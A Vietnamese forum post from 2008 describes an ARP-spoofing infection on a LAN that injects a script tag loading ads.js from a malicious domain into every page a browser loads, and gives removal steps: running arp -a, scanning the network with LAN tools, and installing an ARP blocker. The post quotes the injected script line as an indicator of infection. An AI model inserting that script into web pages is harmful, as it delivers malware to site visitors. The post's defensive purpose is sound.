View: 6876|Reply: 0

Kháng chế virus/trojan ads.js ARP Spoofing

[Copy link]
Posted on 17-9-2008 10:35:30 | Show all floors |Reading mode
Là một người thường xuyên lướt web,cũng hay bị đính virus ,tình cờ hôm qua khi ghé qua các website chia sẻ dữ liệu của Trung Quốc....thế là lượm luôn bệnh cho PC
  Con virus này - tạm gọi là virus, chính xác nó là ARP Spooling - nó có thể bị "lụm" - ý tui là làm thịt - bởi AVG, AntiVir... Nhưng, vấn đề là nó sẽ xuất hiện thông báo liên tục về con virus này ở máy bạn, mặc dù ch.trình diệt virus đã báo là diệt xong. Đơn giản, nó lây qua LAN, khi fát hiện, diệt... máy bị nhiễm đang trong tình trạng broadcast nó sẽ liên tục gửi đến máy bạn. và máy bạn lại nhiễm, cứ như vậy. Việc của bạn là tìm cho ra máy bị nhiễm, thủ tiêu nó!.
Mỗi khi bạn lướt web bằng các trình duyệt: IE, FIrefox, nó sẽ tự động thêm một script lên phần header của trang web
  1. <SCRIPT LANGUAGE=”javascript1.2″ src=”http://u.asdafdgfgf.com/ads.js”></SCRIPT>
Copy code
.
Nội dung của file:
  1. http://u.asdafdgfgf.com/ads.js
Copy code
là một loạt các iframe làm chậm máy tính của bạn, và lây nhanh chóng qua mạng LAN.
Nhiệm vụ của bạn: tìm ra máy tính bị nhiễm trong mạng, và gỡ bỏ nó đi
- đầu tiên vào run gõ cmd tiếp theo gõ arp -a
-nó sẽ hiện ra máy ip có cùng địa chỉ mac với gateway
-tiếp theo download phần mềm Look@lan sau về http://www.snapfiles.com/get/lanlook.html
hoặc dùng Microsoft Network Monitor 3.1 để kiểm dò tìm dấu vết virus trong mạng LAN.
-Gỡ bỏ : bạn tải phần mềm chặn ARP,phòng tránh lây lan qua LAN các virus khác nữa .
Tìm hiểu thêm vẻ ARP: http://www.quantrimang.com.vn/he ... trong_mang_LAN.aspx
You need to log in to reply. Login | Register

Points Rules for This Section

Theo dõi bản tin
Archiver|Mobile|Facebook|Contact|Netdepviet.org

Giữ gìn bản sắc dân tộc · Trân trọng quá khứ, hướng tới tương lai。

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

InThis boardPost
Kết nối Zalo
Back to top